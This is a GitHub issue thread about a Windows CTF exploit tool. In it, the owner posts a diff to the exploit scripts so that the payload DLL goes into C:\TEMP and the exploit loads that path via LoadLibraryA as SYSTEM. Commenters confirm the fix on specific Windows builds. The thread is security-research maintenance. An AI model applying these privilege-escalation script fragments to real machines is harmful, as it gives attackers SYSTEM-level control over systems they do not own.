Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

handle unwritable temp dir #2

Closed
taviso opened this issue Aug 13, 2019 · 5 comments
Closed

handle unwritable temp dir #2

taviso opened this issue Aug 13, 2019 · 5 comments

Comments

@taviso
Copy link
Owner

taviso commented Aug 13, 2019

A comment on twitter says that on some systems C:\Windows\Temp is not writable, but he got the exploit working using C:\Temp instead.

https://twitter.com/matteomalvica/status/1161378715663831040

I should probably handle this in my script.

@taviso
Copy link
Owner Author

taviso commented Aug 13, 2019

I think I will just need to do

run CMD /C MKDIR C:\TEMP
run CMD /C COPY PAYLOAD64.DLL C:\TEMP\EXPLOIT.DLL

Then update the path accordingly, this thing in ctf-exploit-common-win10.ctf:

# And finally, lets load "../TEMP/EXPLOIT", which should be writable by all users.
set r2 0x5c504d45545c2e2e

@taviso
Copy link
Owner Author

taviso commented Aug 13, 2019

Even easier:

run XCOPY PAYLOAD64.DLL C:\TEMP\EXPLOIT.DLL*

This seems to work, testing on a few VMs now:

diff --git a/scripts/ctf-consent-system.ctf b/scripts/ctf-consent-system.ctf
index ded81b7..fcc7a6e 100644
--- a/scripts/ctf-consent-system.ctf
+++ b/scripts/ctf-consent-system.ctf
@@ -5,14 +5,14 @@

 print Attempting to copy exploit payload...

-# This exploit runs LoadLibraryA(C:\WINDOWS\TEMP\EXPLOIT.DLL) as SYSTEM.
-run CMD /C COPY PAYLOAD64.DLL %SYSTEMROOT%\TEMP\EXPLOIT.DLL
+# This exploit runs LoadLibraryA(C:\TEMP\EXPLOIT.DLL) as SYSTEM.
+run XCOPY PAYLOAD64.DLL C:\TEMP\EXPLOIT.DLL*

 # Print a warning if that didnt work.
 repeat rc print
-repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
-repeat rc print !!! THIS EXPLOIT REQUIRES C:\WINDOWS\TEMP\EXPLOIT.DLL TO EXIST !!!
-repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+repeat rc print !!! THIS EXPLOIT REQUIRES C:\TEMP\EXPLOIT.DLL TO EXIST !!!
+repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
 repeat rc print

 print
diff --git a/scripts/ctf-exploit-common-win10.ctf b/scripts/ctf-exploit-common-win10.ctf
index 98af118..e06af18 100644
--- a/scripts/ctf-exploit-common-win10.ctf
+++ b/scripts/ctf-exploit-common-win10.ctf
@@ -420,7 +420,7 @@ repeat r1 callstub 0 0 r3
 print Writing in the payload path "C:\WINDOWS\TEMP\EXPLOIT.DLL"...

 # And finally, lets load "../TEMP/EXPLOIT", which should be writable by all users.
-set r2 0x5c504d45545c2e2e
+set r2 0x5c504d45545c3a43

 patch 0 0xa8 r0 8 -0x120
 set r1 r2
diff --git a/scripts/ctf-logonui-system.ctf b/scripts/ctf-logonui-system.ctf
index 5d28dcc..b2dca0d 100644
--- a/scripts/ctf-logonui-system.ctf
+++ b/scripts/ctf-logonui-system.ctf
@@ -5,8 +5,8 @@

 print Attempting to copy exploit payload...

-# This exploit runs LoadLibraryA(C:\WINDOWS\TEMP\EXPLOIT.DLL) as SYSTEM.
-run CMD /C COPY PAYLOAD64.DLL %SYSTEMROOT%\TEMP\EXPLOIT.DLL
+# This exploit runs LoadLibraryA(C:\TEMP\EXPLOIT.DLL) as SYSTEM.
+run XCOPY PAYLOAD64.DLL C:\TEMP\EXPLOIT.DLL*

 # Print a warning if that didnt work.
 repeat rc print

@taviso
Copy link
Owner Author

taviso commented Aug 13, 2019

Hmm OK, let's do it.

Maybe I should use C:\CTFTOOL, but I'll wait and see if anyone says this doesn't work first.

@taviso taviso closed this as completed in 28083e3 Aug 13, 2019
@uf0o
Copy link

uf0o commented Aug 14, 2019

as a note, the build where I have experienced the issue was 18362.267

@niemand-sec
Copy link

Yep, same issue in Windows 1607. I also fixed it by doing this #2 (comment)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants